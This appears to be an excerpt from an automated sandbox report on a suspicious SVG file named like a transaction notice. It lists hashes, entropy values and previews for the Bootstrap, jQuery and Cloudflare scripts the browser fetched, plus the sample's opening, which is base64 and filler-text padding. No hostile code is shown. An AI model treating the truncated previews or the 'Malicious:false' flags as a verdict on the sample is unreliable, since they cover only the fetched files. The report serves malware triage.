                                                              SHA-512:9FA75814E1B9F7DB38FE61A503A13E60B82D83DB8F4CE30351BD08A6B48C0D854BAF472D891AF23C443C8293380C2325C7B3361B708AF9971AA0EA09A25CDD0A
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
                                                              Preview:/*!. * Bootstrap v4.1.3 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(r){for(var t=1;t<arguments.length;t++){var o=null!=arguments[t]?arguments[t]:{},e=Object.keys(o);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(o).filter(function(t){return Object.getOwnPropertyDescriptor(o,t).enum
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (48122)
                                                              Category:downloaded
                                                              Size (bytes):48123
                                                              Entropy (8bit):5.342998089666478
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:EA38BDA3C117E2FE01BD862003357394
                                                              SHA1:767CCB3589E3067EE1B348DF2426A9E2E32CEE5C
                                                              SHA-256:719423C7B70AC911F76D00B3AE514D108A8315EA60A80519820BE50C0E4C96EF
                                                              SHA-512:F50FAB9DC2263F40216DF26C234AD390091F23185650E9B4E4748CF09CFEDF2D92A99FC81C986234580844393305AC2195E096DEDB64D9A25A99EF7BE510FFCA
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js
                                                              Preview:"use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){jt(l,o,c,v,h,"next",s)}function h(s){jt(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:ASCII text, with very long lines (32012)
                                                              Category:downloaded
                                                              Size (bytes):69597
                                                              Entropy (8bit):5.369216080582935
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                              SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                              SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                              SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                              Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:PNG image data, 82 x 37, 8-bit/color RGB, non-interlaced
                                                              Category:downloaded
                                                              Size (bytes):61
                                                              Entropy (8bit):4.035372245524405
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:92F328FEB67DDFF9F0757F9BAF849EC7
                                                              SHA1:7F25CBBCF83713B0F9CA8BAB217796F53A0F2138
                                                              SHA-256:3BC45F10925DA4D3888797A56C745EA5B4DAF5DE74FBA859990D189D72CA18E8
                                                              SHA-512:FDE1BC11E88EB20BD006C87CD929556AE05D33DC52F7CEBD584689C76B372BBA51CB8852E86AF5CD652CCB810BA3B8C1DCC20C6DED4CFE865D8069C9820EA099
                                                              Malicious:false
                                                              Reputation:unknown
                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/926055dbacd31b53/1742925917170/wCFuu2K25XOK2QX
                                                              Preview:.PNG........IHDR...R...%.....^i).....IDAT.....$.....IEND.B`.
                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                              Category:dropped
                                                              Size (bytes):621
                                                              Entropy (8bit):7.673946009263606
                                                              Encrypted:false
                                                              SSDEEP:
                                                              MD5:4761405717E938D7E7400BB15715DB1E
                                                              SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                              SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                              SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                              Malicious:false
                                                              Reputation:unknown
                                                              File type:HTML document, ASCII text, with CRLF line terminators
                                                              Entropy (8bit):5.330349424292396
                                                              TrID:
                                                                File name:TRANS_ADV_9290910137_.svg
                                                                File size:2'404 bytes
                                                                MD5:7b341b85cc6592b164bdb89e523773e6
                                                                SHA1:fb90fd35e542803631797d5f1af9c2bd8ac41caa
                                                                SHA256:ebb1aa64e9f2eeaebf01d56bb3f5d42bb13f030f7418417a22840926a4918e62
                                                                SHA512:c5541524a66237eb8e451768f3b9ae26e0631f108f3cb58b65d4aa8df8d5765d90cb3456a59cf5a37dc7e1385789573bcb241653a6808978cda884ee14ada06a
                                                                SSDEEP:48:bMa6K23TqsWo4BZmLGUNP7qLOUNhNrZJWZGvmTstZJxODc+6r+e:oX/3T3yZmLZWHaAv8wZJxODJq
                                                                TLSH:D641B62F09D495383A754216A3F19A5BDB279817B39403A5FC8CDBC75F304A0282B9ED
                                                                File Content Preview: U3RyaXAgc3RlYWsgaXBzdW0gbW9sbGl0IGR1aXMgZHJ1bXN0aWNrIGNvcm5lZCBiZWVmIGFsY2F0cmEgcmVwcmVoZW5kZXJpdCBlbmltIHBpZyBjb25zZXF1YXQu --> Cupim ham hock culpa tenderloin, sirloin mollit in commodo meatball.-->.. <svg xmlns="http://www.w3.org/2000/
                                                                Icon Hash:173149cccc490307